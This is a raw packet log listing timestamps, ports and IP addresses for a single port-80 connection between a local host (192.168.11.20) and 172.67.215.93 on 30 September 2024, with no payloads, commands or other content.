Sep 30, 2024 15:10:14.741561890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741564989 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.741611958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741765976 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.741765976 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.741813898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741835117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741854906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741873026 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741892099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741904974 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.741920948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741940975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741964102 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.741985083 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742005110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742077112 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.742077112 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.742247105 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.742388010 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742408991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742417097 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.742444992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742496967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742584944 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.742618084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742638111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742657900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742676020 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742727041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.742757082 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.742757082 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.742924929 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.742924929 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.742965937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743017912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743037939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743058920 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743078947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743100882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743140936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743266106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.743266106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.743341923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743391991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743412971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743432045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743457079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743475914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743485928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.743495941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743515015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.743655920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.743655920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.743655920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.743824959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.744136095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.744194031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.744240046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.744290113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.744309902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.744329929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.744419098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.744434118 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.744435072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.744435072 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.744472027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.744604111 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.744604111 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.744772911 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.745156050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745171070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745369911 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.745423079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745439053 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745450974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745462894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745475054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745486975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745498896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745543957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.745709896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.745709896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.745757103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.746289015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.746397972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.746412992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.746424913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.746464968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.746506929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.746536016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.746547937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.746560097 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.746635914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.746805906 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.747262001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.747320890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.747338057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.747349977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.747430086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.747451067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.747486115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.747498035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.747509956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.747621059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.747621059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.747791052 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.754359007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.754374981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.754386902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.754398108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.754410028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.754420996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.754549026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.754719019 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.759329081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759342909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759394884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759419918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759430885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759517908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.759563923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759736061 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.759736061 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.759903908 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759917974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759960890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759972095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759983063 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.759994030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760005951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760016918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760026932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760037899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760077953 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.760246992 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.760710001 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760720968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760731936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760742903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760833979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760848045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760859013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760870934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.760898113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.761068106 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.761681080 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.761696100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.761787891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.761801958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.761812925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.761826992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.761837959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.762028933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.762041092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.762209892 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.762209892 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.765487909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.765614986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.765626907 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.765638113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.765677929 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.765846968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.765846968 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.765986919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766129971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766144037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766187906 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.766406059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.766576052 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.766592026 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766607046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766618013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766628981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766665936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766794920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.766834974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766846895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766936064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.766947985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767087936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767102003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767184019 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.767213106 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767227888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767354965 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.767354965 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.767523050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.767573118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767695904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767748117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767817974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767863989 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.767863989 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.767911911 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.767976046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.767987967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768070936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768083096 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.768121958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768254042 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.768254042 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.768471956 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.768767118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768820047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768831968 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768842936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768853903 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768867970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768923998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.768935919 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.769002914 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.769172907 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.769821882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.769835949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.769892931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.769943953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770019054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770068884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770109892 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.770109892 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.770224094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770236015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770277977 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.770277977 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.770447016 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.770492077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770617962 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.770637035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770692110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770703077 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770714045 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770744085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770787954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.770787954 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.770962000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.770972967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.771006107 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.771176100 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.771346092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.771584988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.771598101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.771609068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.771650076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.771728039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.771826982 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.771841049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.771852970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.771872044 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.771872044 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.772042036 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.772042036 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.772212029 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.772552967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.772600889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.772773027 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.773705959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.773893118 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.773951054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.773962975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.774138927 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.774138927 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.869796991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.869913101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.869976044 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.870146036 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.870513916 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.870640039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.870706081 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.870755911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.870805025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.870876074 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.871046066 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.871171951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.871284008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.871360064 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.871412039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.871462107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.871532917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.871602058 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.871602058 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.871602058 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.871768951 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.871793985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.871866941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.871939898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.872092962 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.872145891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.872158051 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.872302055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.872330904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.872330904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.872477055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.872499943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.872626066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.872643948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.872718096 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.872893095 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.881858110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.881891966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.882097960 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.882113934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.882267952 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.882339954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.882486105 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.882698059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.882724047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.882745981 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.882769108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.882787943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.882807970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.882895947 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.882895947 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.882895947 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.882930040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.883104086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.883150101 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.883318901 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.883377075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.883441925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.883516073 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.883660078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.883660078 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.883699894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.883723021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.883743048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.883758068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.883877993 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.884006023 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.884027004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.884049892 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.884217978 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.884325981 CEST	80	49754	172.67.215.93	192.168.11.20
